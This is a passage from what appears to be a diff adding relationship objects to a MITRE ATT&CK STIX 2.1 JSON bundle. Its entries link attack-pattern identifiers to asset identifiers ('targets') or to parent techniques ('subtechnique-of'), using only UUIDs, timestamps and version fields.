"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--977968e1-b741-4450-9924-7c32cbb07214", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9794e87a-1130-4d59-863f-f0c55e53ae30", + "created": "2024-05-21T16:22:20.991Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-21T16:22:20.991Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--97a35703-d04f-4405-88a3-a56f131e7f3f", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--97a78a34-a3d8-40da-8557-5351946c99a9", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--97b062a7-3f71-465c-8989-2775e3a32a44", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--97b458cc-467c-4aa8-97db-f9ea1cb51e28", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c99724c-a483-4d60-ad9d-7f004e42e8e8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--97d152a1-4cbd-4088-b23e-99354a730e47", + "created": "2020-10-19T23:51:06.043Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "target_ref": "attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--97e07e34-9c44-42f3-8ded-5b3a9086e2c7", + "created": "2024-06-27T09:44:19.566Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:44:19.566Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--97e2079d-5177-4565-96a8-2373e7c27f3b", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--97e20860-29d9-4738-a9a8-6cc3e4db23f1", + "created": "2023-09-29T16:40:54.250Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:40:54.250Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--97f42cef-bc2a-47c5-b408-8e38aab4030e", + "created": "2023-09-29T16:41:32.631Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:41:32.631Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--97f863d7-e68a-4cc8-ab3b-a7e9a1cc2319", + "created": "2023-09-29T18:47:52.800Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:47:52.800Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--97fb62dd-99f0-4b04-a64c-5fcf70c8ed7a", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--981ca761-62e7-4b58-aecb-7ab3c28468b2", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--982441e5-d8f3-4b12-a765-4b503ce5db3b", + "created": "2020-02-04T12:52:13.385Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--982d0b4f-274a-4738-9262-57fc80d468f9", + "created": "2024-03-26T15:41:51.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-26T15:41:51.806Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--983c884f-e37c-4d4b-a654-cf3d41bb39ef", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3a32740a-11b0-4bcf-b0a9-3abd0f6d3cd5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--98485046-92d3-439e-bbf0-21b763e1d641", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--985a9e0e-3561-44ed-80ba-3eb2e1ae2890", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--986108c6-8a48-4785-8830-fbf2b070ca2e", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--986766ac-7e3d-40fe-820b-3d6bf5cd3469", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--986f6035-0ef8-47ae-a719-22cb4fbcbc1c", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--98bf487f-114d-4e56-b0f4-10d1d09b3282", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--98eee7a1-6344-4a5a-ab8f-d0d5d5eada70", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--98efb6d4-2930-4bc1-a9dd-d1f50f2d6878", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--98f20174-45b1-4901-85dc-f7abf0fbaf77", + "created": "2024-06-25T13:25:06.759Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-25T13:25:06.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a009cb25-4801-4116-9105-80a91cf15c1b", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--98f295cb-b48f-43e3-b076-0f22333573b2", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--98f60959-b602-4c89-9998-a1041ac27789", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--98f75297-d432-49c0-be49-ddb152060628", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9931569c-1fd7-4f0d-a096-6eff7135cb2b", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9935a529-9739-4f31-920f-eb24008fd6de", + "created": "2024-06-26T15:40:21.500Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:40:21.500Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--994a6343-c2c3-4edb-b00b-427024d20789", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--995180a7-ced8-41ab-bacf-233e181eb6d9", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea4c2f9c-9df1-477c-8c42-6da1118f2ac4", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9951eb11-8140-420d-8e2d-56fbe0ff0134", + "created": "2023-09-29T18:03:23.576Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:03:23.576Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--99702ea1-f74e-41b2-8130-1fa975ac3cec", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--997669d5-29e4-4a89-81b8-9aa84ebce527", + "created": "2020-10-02T16:46:42.674Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d", + "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--997e986b-d3ce-4b65-bfa5-9b1bc8492484", + "created": "2024-06-27T09:29:24.269Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:29:24.269Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--99994a2f-c6d3-4766-92e4-b8d1e62e8aa4", + "created": "2020-02-12T14:10:51.040Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", + "target_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", + "x_mitre_modified_by_ref": 